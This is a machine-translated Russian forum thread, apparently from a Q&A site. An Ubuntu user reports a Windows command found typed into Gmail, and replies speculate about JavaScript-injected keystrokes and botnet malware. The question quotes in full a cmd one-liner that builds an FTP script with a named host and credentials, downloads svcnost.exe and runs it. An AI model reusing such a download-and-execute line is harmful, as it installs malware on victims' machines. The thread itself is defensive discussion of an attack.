Как определить, был ли взломан мой Linux-компьютер?

Мой домашний компьютер обычно включен, но монитор выключен. Этим вечером я пришел домой с работы и обнаружил, что выглядит как попытка взлома: в моем браузере был открыт мой Gmail (это был я), но он находился в режиме составления со следующим в TOполе:

md / c echo open cCTeamFtp.yi.org 21 >> ik & echo user ccteam10 765824 >> ik & echo binary >> ik & echo get svcnost.exe >> ik & echo bye >> ik & ftp -n -v -s: ik & del ik & svcnost.exe & exit echo

Для меня это выглядит как код командной строки Windows, а mdзапуск кода в сочетании с тем фактом, что Gmail находился в режиме создания, делает очевидным, что кто-то пытался выполнить cmdкоманду. Думаю, мне повезло, что я не запускаю Windows на этом ПК, но у меня есть другие, которые делают это. Это первый раз, когда подобное случается со мной. Я не гуру Linux, и в то время я не запускал никаких других программ, кроме Firefox.

Я абсолютно уверен, что я не написал это, и никто другой не был физически за моим компьютером. Кроме того, я недавно изменил свой пароль Google (и все остальные мои пароли) на что-то вроде этого, vMA8ogd7bvпоэтому я не думаю, что кто-то взломал мою учетную запись Google.

Что сейчас произошло? Как кто-то нажимает клавиши на моем компьютере, если это не старая машина Windows, на которой работает бабушка, годами запускающая вредоносное ПО, а недавно установленная новая версия Ubuntu?

Обновление:
позвольте мне обратиться к некоторым пунктам и вопросам:

• Я в Австрии, в деревне. Мой маршрутизатор WLAN использует WPA2 / PSK и пароль средней надежности, которого нет в словаре; должен был быть грубым и менее чем в 50 метрах отсюда; маловероятно, что его взломали.
• Я использую проводную клавиатуру USB, так что очень маловероятно, что кто-то может быть в пределах досягаемости, чтобы взломать ее.
• Я не использовал свой компьютер в то время; это было просто бездельничать дома, пока я был на работе. Это установленный на мониторе неттоп ПК, поэтому я редко его выключаю.
• Машине всего два месяца, работает только Ubuntu, и я не использую странные программы и не посещаю странные сайты. В основном это Stack Exchange, Gmail и газеты. Нет игр. Ubuntu настроен на то, чтобы обновляться.
• Я не знаю ни одного работающего сервиса VNC; Я, конечно, не установил или не включил один. Я также не запускал никаких других серверов. Я не уверен, если какие-либо из них работают в Ubuntu по умолчанию?
• Я знаю все IP-адреса в учетной записи Gmail. Я уверен, что Google не был прихожей.
• Я нашел средство просмотра файлов журнала , но не знаю, что искать. Помогите?

Что я действительно хочу знать, так это то, что заставляет меня чувствовать себя небезопасно, так это то, как кто-то из Интернета может нажимать клавиши на моей машине? Как я могу предотвратить это, не думая об этом? Я не фанат Linux, я отец, который уже более 20 лет работает с Windows и устал от этого. И за все 18 с лишним лет пребывания в сети я никогда лично не видел попыток взлома, так что для меня это ново.

Я сомневаюсь, что тебе есть о чем беспокоиться. Скорее всего, это была атака JavaScript, которая пыталась сделать диск загрузкой . Если вас это беспокоит, начните использовать дополнения NoScript и AdBlock Plus Firefox.

Даже посещая надежные сайты, вы не защищены, потому что они запускают код JavaScript от сторонних рекламодателей, который может быть вредоносным.

Я схватил его и запустил в ВМ. Он установил mirc и это журнал состояния ... http://pastebin.com/Mn85akMk

Это автоматическая атака, которая пытается заставить вас загрузить mIRC и присоединиться к ботнету, который превратит вас в спамбота ... Он подключил мою виртуальную машину и установил соединение с несколькими различными удаленными адресами, один из которых является autoemail-119.west320.com.

При запуске в Windows 7 мне пришлось принять приглашение UAC и разрешить доступ через брандмауэр.

Кажется, на других форумах есть тонны сообщений об этой точной команде, и кто-то даже говорит, что торрент-файл пытался выполнить его после завершения загрузки ... Хотя я не уверен, как это возможно.

Я не использовал это сам, но он должен быть в состоянии показать вам текущие сетевые подключения, чтобы вы могли увидеть, если вы подключены к чему-то вне нормы: http://netactview.sourceforge.net/download.html

Я согласен с @ jb48394, что это, вероятно, эксплойт JavaScript, как и все остальное в наши дни.

Тот факт, что он пытался открыть cmdокно (см . Комментарий @ torbengb ) и запустить вредоносную команду, а не просто незаметно загружать троян в фоновом режиме, предполагает, что он использует некоторую уязвимость в Firefox, которая позволяет ему вводить нажатия клавиш, но не запускать код.

Это также объясняет , почему этот подвиг, который был явно написан исключительно для Windows, также будет работать в Linux: Firefox работает код JavaScript , так же , как во всех OS'es (по крайней мере, он пытается :)) . Если бы это было вызвано переполнением буфера или подобным эксплойтом, предназначенным для Windows, это просто привело бы к сбою программы.

Что касается того, откуда появился код JavaScript - вероятно, вредоносная реклама Google (рекламный цикл в Gmail в течение дня) . Это не было бы первое время .

Я обнаружил похожую атаку на другой Linux-машине. Кажется, это какая-то команда FTP для Windows.

Это не отвечает на весь ваш вопрос, но в файле журнала ищите неудачные попытки входа.

Если в вашем журнале более пяти неудачных попыток, кто-то попытался взломать root. Если есть успешная попытка войти в систему, rootкогда вы были вдали от компьютера, ИЗМЕНИТЕ СВОЙ ПАРОЛЬ НЕМЕДЛЕННО !! Я имею в виду прямо сейчас! Желательно что-то буквенно-цифровое, длиной около 10 символов.

С сообщениями, которые вы получили ( echoкоманды), это действительно звучит как какой-то незрелый сценарий, детка . Если бы это был настоящий хакер, который знает, что он делает, вы, вероятно, все равно не узнали бы об этом.

whois Сообщает, что west320.com принадлежит Microsoft.

UPnP и Vino (Система -> Настройки -> Удаленный рабочий стол) в сочетании со слабым паролем Ubuntu?

Вы использовали нестандартные репозитории?

DEF CON проводит соревнования по Wi-Fi каждый год в отношении того, как далеко можно добраться до точки доступа Wi-Fi - в последний раз я слышал, что это 250 миль.

Если вы действительно хотите испугаться, посмотрите на скриншоты центра командного управления ботнетом Zeus . Ни одна машина не является безопасной, но Firefox в Linux безопаснее остальных. Еще лучше, если вы запустите SELinux .